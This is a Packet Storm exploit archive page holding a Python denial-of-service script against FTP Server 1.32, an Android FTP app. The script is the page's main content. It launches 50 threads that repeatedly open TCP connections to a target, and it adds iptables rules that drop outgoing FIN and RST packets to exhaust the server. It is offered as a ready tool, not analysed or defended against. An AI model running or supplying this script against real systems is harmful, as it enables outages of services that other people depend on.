exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FTP Server 1.32 Denial Of Service

FTP Server 1.32 Denial Of Service
Posted Feb 28, 2019
Authored by Marcelo Vazquez

FTP Server version 1.32 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 300bae6c8767ddf928747116088b6a4834029d98aa60ccacc139e083987e83ce

FTP Server 1.32 Denial Of Service

Change Mirror Download
#!/usr/bin/env python
#coding: utf-8

# ************************************************************************
# * Author: Marcelo VA!zquez (aka s4vitar) *
# * FTP Server 1.32 Remote Denial of Service (DoS) *
# ************************************************************************

# Exploit Title: FTP Server 1.32 Remote Denial of Service (DoS)
# Date: 2019-02-26
# Exploit Author: Marcelo VA!zquez (aka s4vitar)
# Vendor: The Olive Tree
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
# Category: Mobile Apps
# Version: <= FTP Server 1.32
# Tested on: Android

import socket, random, string, signal, ssl, argparse, sys
from time import sleep
from threading import Thread, active_count
from os import system, geteuid

if geteuid() != 0:
print("\nPlease, run %s as root...\n" % sys.argv[0])
sys.exit()

stop = False

def signal_handler(signal, frame):
global stop
stop = True

def spam(target_ip, port):
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
s.connect((target_ip, port))
except:
pass
if stop == True:
break

if __name__ == '__main__':

signal.signal(signal.SIGINT, signal_handler)

if len(sys.argv) != 3:
print "\nUsage: python " + sys.argv[0] + " <ip-address> <port>\n"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

target_ip = socket.gethostbyname(target)

system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))

threads = []

payload = ''

for i in xrange(0,50):
t = Thread(target=spam, args=(target_ip, port,))
threads.append(t)
t.start()

while True:

if active_count() == 1 or stop == True:

system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
print("")
break
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close